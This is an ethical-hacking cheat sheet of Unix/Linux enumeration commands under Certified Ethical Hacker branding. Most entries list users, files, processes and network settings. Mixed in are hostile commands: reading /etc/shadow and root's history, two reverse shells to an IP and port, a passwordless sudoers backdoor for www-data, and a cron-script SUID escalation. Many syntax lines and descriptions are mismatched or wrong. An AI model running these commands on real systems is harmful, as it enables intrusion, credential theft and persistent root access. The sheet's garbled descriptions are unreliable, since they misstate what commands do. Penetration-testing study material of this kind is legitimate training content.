Unix Linux Enumeration Cheat Sheet

The document is a cheat sheet for Unix/Linux enumeration techniques used in ethical hacking, detailing various commands and their descriptions. It covers commands for user enumeration, file permissions, network configurations, and system information. Additionally, it provides examples of how to use these commands effectively for security assessments.

Uploaded by raghuvardhan41
Ethical Hacking and Countermeasures

Certified Ethical Hacker

Unix/Linux Enumeration Cheat Sheet

Syntax:      /usr/bin/rusers [-a] [-l] [-u| -h| -i] [Host ...]
Command:     rusers
Description: Displays a list of users who are logged on to remote machines or machines on the local network

Syntax:      rwho [ -a]
Command:     rwho
Description: Displays a list of users who are logged in to hosts on the local network

Syntax:      finger [-l] [-m] [-p] [-s] [user ...] [user@host ...]
Command:     finger
Description: Displays information about system users such as user’s login name, real name, terminal name, idle time, login time, office location, and office phone numbers

Syntax:      uname [options]
Command:     uname -a
Description: Displays OS name and version and other details about the current machine.

Syntax:      pinky [OPTION]... [USER]...
Command:     pinky
Description: Displays the information about the users currently logged in

Syntax:      users [OPTION]... [FILE]
Command:     users
Description: Displays the information about the users currently logged in

Syntax:      who [options] [filename]
Command:     who -a
Description: Displays the information about the users currently logged in

Syntax:      uname [options]
Command:     uname -r
Description: Used to display kernel release

Syntax:      hostname -[option] [file]
Command:     hostname
Description: Used to display kernel release

Syntax:      uname [options]
Command:     uname -n
Description: Used to display System hostname

Syntax:      env [OPTION]... [-][NAME=VALUE]... [COMMAND [ARG]...]
Command:     env
Description: Displays all the environmental variables information

Syntax:      sudo OPTION.. COMMAND
Command:     sudo -l
Description: Displays all sudo information of the current user

Syntax:      sudo OPTION.. COMMAND
Command:     sudo -V
Description: To check Sudo version

Syntax:      pwd [OPTION]...
Command:     pwd
Description: Outputs the current working directory path.

Syntax:      ls [options] [file|dir]
Command:     ls -al
Description: Lists all the files and their permissions in the current directory

Syntax:      ls [options] [file|dir]
Command:     ls -ahlR /root/
Description: See if you can access other user directories to find interesting files

Syntax:      ls [options] [file|dir]
Command:     ls -la ~/.*_history
Description: Show the current users’ various history files

Syntax:      ls [options] [file|dir]
Command:     ls -la ~/.ssh/
Description: Check for interesting ssh files in the current users’ directory

Syntax:      ls [options] [file|dir]
Command:     ls -la /root/.*_history
Description: Read root’s history files

Syntax:      ls [options] [file|dir]
Command:     ls -la /usr/sbin/in.*
Description: Check Configuration of inetd services

Syntax:      ls [options] [file|dir]
Command:     ls -la /etc/cron*
Description: Scheduled jobs overview (hourly, daily, monthly etc)

Syntax:      ls [options] [file|dir]
Command:     ls -la /etc/cron.d
Description: Prints cron jobs which are already present in cron.d

Syntax:      ls [options] [file|dir]
Command:     ls -la rootme
Description: Tells us that it is owned by user

Syntax:      ls [options] [file|dir]
Command:     ls -la /etc/*.conf
Description: Lists .conf files in /etc (recursive 1 level)

Syntax:      ls [options] [file|dir]
Command:     ls -la /etc/exports 2>/dev/null; cat /etc/exports 2>/dev/null
Description: Check the permissions and contents of /etc/exports (NFS)

Syntax:      ls [options] [file|dir]
Command:     ls -aRl /etc/cron* | awk '$1 ~ /w.$/' 2>/dev/null
Description: Check what can ‘others’ write in /etc/cron* directories

Syntax:      find /home/username/ -name "*.err" 2>/dev/null
Command:     find / -perm /6000 2>/dev/null
Description: Lists out all the SUID and SGID files

Syntax:      find /home/username/ -name "*.err" 2>/dev/null
Command:     find / -uid 0 -perm -4000 -type f 2>/dev/null
Description: Lists out all the SUID and SGID files

Syntax:      find /home/username/ -name "*.err" 2>/dev/null
Command:     find / -perm -4000 -user root -exec ls -ld {} \; 2>/dev/null
Description: Find SUIDs

Syntax:      find /home/username/ -name "*.err" 2>/dev/null
Command:     find / -perm -2000 -group root -exec ls -ld {} \; 2>/dev/null
Description: Find SGID

Syntax:      find /home/username/ -name "*.err" 2>/dev/null
Command:     find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null
Description: Find world-writeable files excluding those in /proc

Syntax:      find /home/username/ -name "*.err" 2>/dev/null
Command:     find / -xdev -type d -perm -0002 -ls 2>/dev/null
Description: Find World Writable Folders

Syntax:      find /home/username/ -name "*.err" 2>/dev/null
Command:     find / -xdev -type f -perm -0002 -ls 2>/dev/null
Description: Find World Writable Files

Syntax:      find /home/username/ -name "*.err" 2>/dev/null
Command:     find / -perm -2 -type d 2>/dev/null
Description: Find world-writeable directories

Syntax:      find /home/username/ -name "*.err" 2>/dev/null
Command:     find /home -name "*.rhosts" -print 2>/dev/null
Description: Find rhost config files

Syntax:      find /home/username/ -name "*.err" 2>/dev/null
Command:     find /home -iname "*.plan" -exec ls -la {} \; -exec cat {} 2>/dev/null \;
Description: Find *.plan files, list permissions and cat the file contents

Syntax:      find /home/username/ -name "*.err" 2>/dev/null
Command:     find /etc -iname hosts.equiv -exec ls -la {} 2>/dev/null \; -exec cat {} 2>/dev/null \;
Description: Find hosts.equiv, list permissions and cat the file contents

Syntax:      find /home/username/ -name "*.err" 2>/dev/null
Command:     find /var/log -type f -exec ls -la {} \; 2>/dev/null
Description: List files in specified directory (/var/log)

Syntax:      find /home/username/ -name "*.err" 2>/dev/null
Command:     find / -name "id_dsa*" -o -name "id_rsa*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" 2>/dev/null |xargs -r ls -la
Description: Find SSH keys/host information

Syntax:      find /home/username/ -name "*.err" 2>/dev/null
Command:     find / -name %program_name% 2>/dev/null
Description: Locate ‘useful’ programs (i.e. nc, netcat, wget, nmap etc)

Syntax:      find /home/username/ -name "*.err" 2>/dev/null
Command:     find /etc/ -maxdepth 1 -name "*.conf" -type f -exec ls -la {} \;
Description: List .conf files in /etc (recursive 1 level)

Syntax:      find /home/username/ -name "*.err" 2>/dev/null
Command:     ls -la /etc/exports 2>/dev/null; cat /etc/exports 2>/dev/null
Description: Find .conf files (recursive 4 levels) and output line number where the word ‘password’ is located

Syntax:      cat [OPTION] [FILE]...
Command:     cat /etc/passwd
Description: List all the users

Syntax:      cat [OPTION] [FILE]...
Command:     cat /etc/group
Description: List all the groups on the system

Syntax:      cat [OPTION] [FILE]...
Command:     cat /etc/shadow
Description: Display all the users and their password hashes.

Syntax:      cat [OPTION] [FILE]...
Command:     cat ~/.bash_history
Description: Shows the current users’ command history

Syntax:      cat [OPTION] [FILE]...
Command:     cat /etc/fstab
Description: Used to check fstab

Syntax:      cat [OPTION] [FILE]...
Command:     cat /etc/services
Description: Used to check running services

Syntax:      cat [OPTION] [FILE]...
Command:     cat /etc/sudoers
Description: Check who’s allowed to do what as root – Privileged command

Syntax:      cat [OPTION] [FILE]...
Command:     cat /proc/version
Description: Used to display kernel information

Syntax:      cat [OPTION] [FILE]...
Command:     cat /etc/*-release
Description: Used to display Distribution information

Syntax:      cat [OPTION] [FILE]...
Command:     cat /etc/profile
Description: Display default system variables

Syntax:      cat [OPTION] [FILE]...
Command:     cat /etc/shells
Description: Display available shells

Syntax:      cat [OPTION] [FILE]...
Command:     cat /etc/issue
Description: Used to display Distribution information

Syntax:      cat [OPTION] [FILE]...
Command:     cat /proc/cpuinfo
Description: Used to display CPU information

Syntax:      cat [OPTION] [FILE]...
Command:     cat /etc/cron*
Description: Used to check cronjobs

Syntax:      cat [OPTION] [FILE]...
Command:     cat /etc/inetd.conf
Description: List services managed by inetd

Syntax:      cat [OPTION] [FILE]...
Command:     cat /etc/xinetd.conf
Description: List services managed by inetd xinetd

Syntax:      cat [OPTION] [FILE]...
Command:     cat /etc/xinetd.conf 2>/dev/null | awk '{print $7}' |xargs -r ls -la 2>/dev/null
Description: Extract associated binaries from xinetd.conf and show permissions of each

www.eccouncil.org/ceh
Over 50% Of Professionals Received Promotions after C|EH

Syntax:      cat [OPTION] [FILE]...
Command:     cat /etc/network/interfaces
Description: Used to list all network interfaces

Syntax:      cat [OPTION] [FILE]...
Command:     cat /etc/resolv.conf
Description: View port numbers/services mappings

Syntax:      cat [OPTION] [FILE]...
Command:     cat /etc/services
Description: View port numbers/services mappings

Syntax:      cat [OPTION] [FILE]...
Command:     cat /etc/apache2/envvars 2>/dev/null |grep -Ei 'user|group' |awk '{sub(/.*export /,"")}1'
Description: Check which account is Apache running as

Syntax:      id [OPTION]
Command:     id
Description: Displays the user ID and group ID of current user

Syntax:      whoami [OPTION]
Command:     whoami
Description: Outputs the name of the current user

Syntax:      netstat [OPTION]
Command:     netstat -antup
Description: Check for open ports

Syntax:      netstat [OPTION]
Command:     netstat -antp
Description: Lists all TCP sockets and related PIDs (-p Privileged command)

Syntax:      netstat [OPTION]
Command:     netstat -anup
Description: Lists all UDP sockets and related PIDs (-p Privileged command)

Syntax:      cat [OPTION] [FILE]...
Command:     cat /etc/sudoers
Description: Check who’s allowed to do what as root – Privileged command

Syntax:      ps [OPTIONS]
Command:     ps -elf
Description: Check Processes

Syntax:      ps [OPTIONS]
Command:     ps -elf | grep root
Description: Check processes running without root privileges

Syntax:      ps [OPTIONS]
Command:     ps aux | grep root
Description: View services running as root

Syntax:      ps [OPTIONS]
Command:     ps aux | awk '{print $11}' |xargs -r ls -la 2>/dev/null |awk '!x[$0]++'
Description: Lookup process binary path and permissions

Syntax:      dpkg [option...] action
Command:     dpkg -l / rpm -qa
Description: Check installed packages

Syntax:      dpkg [option...] action
Command:     dpkg -l
Description: Check Installed packages (Debian)

Syntax:      dpkg [option...] action
Command:     dpkg --list 2>/dev/null| grep compiler |grep -v decompiler 2>/dev/null && yum list installed 'gcc*' 2>/dev/null| grep gcc 2>/dev/null
Description: List available compilers

Syntax:      rpm -qa
Command:     rpm -qa
Description: Shows Installed packages (Red Hat)

Syntax:      ip [options] OBJECT COMMAND
Command:     ip addr
Description: Check network configuration

Syntax:      socat INPUT_TYPE(OPTIONS) OUTPUT_TYPE(OPTIONS)
Command:     socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
Description: Used for Listening port using socat

Syntax:      socat INPUT_TYPE(OPTIONS) OUTPUT_TYPE(OPTIONS)
Command:     socat file:`tty`,raw,echo=0 tcp-listen:4444
Description: Used for Connecting to the port using socat

Syntax:      mknod device-name device-type major-number minor-number
Command:     mknod /tmp/backpipe p; /bin/sh 0</tmp/backpipe | nc <ip> <port> 1>/tmp/backpipe; rm /tmp/backpipe
Description: Used for Reverse connection using mknod

Syntax:      username host_list = (users) command
Command:     echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers
Description: Edit sudoers file and grant sudo access to the current user with no password

Syntax:      echo [option] [string]
Command:     echo $PATH
Description: Displays Path information

Syntax:      echo [option] [string]
Command:     echo "chown root:root /tmp/rootme; chmod u+s /tmp/rootme;">/usr/local/sbin/cron-logrotate.sh
Description: Change the executable’s file owner and group as root. It will also set the SUID bit

Syntax:      df [OPTION]...[FILE]...
Command:     df -a
Description: Display File system information

Syntax:      df [OPTION]...[FILE]...
Command:     df -h
Description: Check the storage information

Syntax:      for NAME [in WORDS ... ] ; do COMMANDS;
Command:     for i in $(cat /etc/passwd 2>/dev/null| cut -d":" -f1 2>/dev/null);do id $i;done 2>/dev/null
Description: List all uid’s and respective group memberships

Syntax:      grep [options] pattern [files]
Command:     grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'
Description: Shows the list of all super user accounts

Syntax:      grep [options] pattern [files]
Command:     sudo -V | grep "Sudo ver" | grep "1.6.8p9\|1.6.9p18\|1.8.14\|1.8.20\|1.6.9p21\|1.7.2p4\|1\.8\.[0123]$\|1\.3\.[^1]\|1\.4\.\d*\|1\.5\.\d*\|1\.6\.\d*\|1.5$\|1.6$"
Description: Check if the sudo version is vulnerable using this grep

Syntax:      grep [options] pattern [files]
Command:     grep -l -i pass /var/log/*.log 2>/dev/null
Description: Check log files for keywords (‘pass’ in this example) and show positive matches

Syntax:      w [options] user [...]
Command:     w
Description: Check who is currently logged in and what they’re doing

Syntax:      last [options] [username...] [tty...]
Command:     last
Description: Used for listing of last logged on users

Syntax:      lastlog [<-u|--user> login-name] [<-t|--time> days] [<-h|--help>]
Command:     lastlog
Description: Get the information on when all users last logged in

Syntax:      lastlog [<-u|--user> login-name] [<-t|--time> days] [<-h|--help>]
Command:     lastlog -u %username%
Description: Gives information on when the specified user last logged in

Syntax:      lastlog [<-u|--user> login-name] [<-t|--time> days] [<-h|--help>]
Command:     lastlog |grep -v "Never"
Description: Shows the entire list of previously logged on users

Syntax:      set [--abefhkmnptuvxBCHP] [-o option-name] [arg ...]
Command:     set
Description: Displays environmental variables

Syntax:      dpkg [options] filename
Command:     dpkg -l <application name>
Description: Check the version of an installed application

Syntax:      $ history
Command:     history
Description: Displays command history of current user

Syntax:      lsof [option][user name]
Command:     lsof -i -n
Description: List open files (output will depend on account privileges)

Syntax:      head [OPTION]... [FILE]...
Command:     head /var/mail/root
Description: Read roots mail using this command

Syntax:      crontab [-u user]
Command:     crontab -l -u %username%
Description: Display scheduled jobs for the specified user – Privileged command

Syntax:      $ top
Command:     top
Description: Get the list of current tasks

Syntax:      ifconfig [...OPTIONS] [INTERFACE]
Command:     /sbin/ifconfig -a
Description: Lists all network interfaces

Syntax:      arp [-v] [-i if] [-H type] -a [hostname]
Command:     arp -a
Description: Display ARP communications

Syntax:      route
Command:     route
Description: Display route information

Syntax:      iptables --table TABLE -A/-C/-D... CHAIN rule --jump Target
Command:     iptables -L
Description: List rules – Privileged command

Syntax:      apachectl command
Command:     apache2ctl (or apachectl) -M
Description: List loaded Apache modules

Syntax:      mysql --version
Command:     mysql --version
Description: Displays the installed MYSQL version details

Syntax:      psql [ option... ] [ dbname [ username ] ]
Command:     psql -V
Description: Provides the installed Postgres version details

Syntax:      $ perl -v
Command:     perl -v
Description: Provides installed Perl version details

Syntax:      java [ options ] class [ argument ... ]
Command:     java -version
Description: Provides Installed Java version details

Syntax:      python [ -d ] [ -E ] [ -h ] [ -i ] [ -m module-name ] [ -O ] [ -Q argument ] [ -S ] [ -t ] [ -u ] [ -v ] [ -V ] [ -W argument ] [ -x ] [ -c command | script | - ] [ arguments ]
Command:     python --version
Description: Get Installed Python version details

Syntax:      ruby [--copyright] [--version] [-Sacdlnpswvy] [-0[octal]] [-C directory] [-F pattern] [-I directory] [-K c] [-T[level]] [-e command] [-i[extension]] [-r library] [-x[directory]] [--] [program_file] [argument ...]
Command:     ruby -v
Description: Get Installed Ruby version details

Syntax:      which [filename1] [filename2] ...
Command:     which %program_name% (i.e. nc, netcat, wget, nmap etc)
Description: Used to locate ‘useful’ programs (netcat, wget etc)

Syntax:      screen [-opts] [cmd [args]]
Command:     screen -ls
Description: List screen sessions

Syntax:      screen [-opts] [cmd [args]]
Command:     screen -dr <session>
Description: Used to attach to a session

Syntax:      tmux [-2CluvV] [-c shell-command] [-f file] [-L socket-name] [-S socket-path] [command [flags]]
Command:     tmux ls
Description: Get a list of the currently running sessions

Syntax:      tmux [-2CluvV] [-c shell-command] [-f file] [-L socket-name] [-S socket-path] [command [flags]]
Command:     tmux attach-session -t 0
Description: To attach a session

Syntax:      timeout [OPTION] DURATION COMMAND [ARG]...
Command:     timeout 1 tcpdump
Description: Used to check if you can sniff traffic
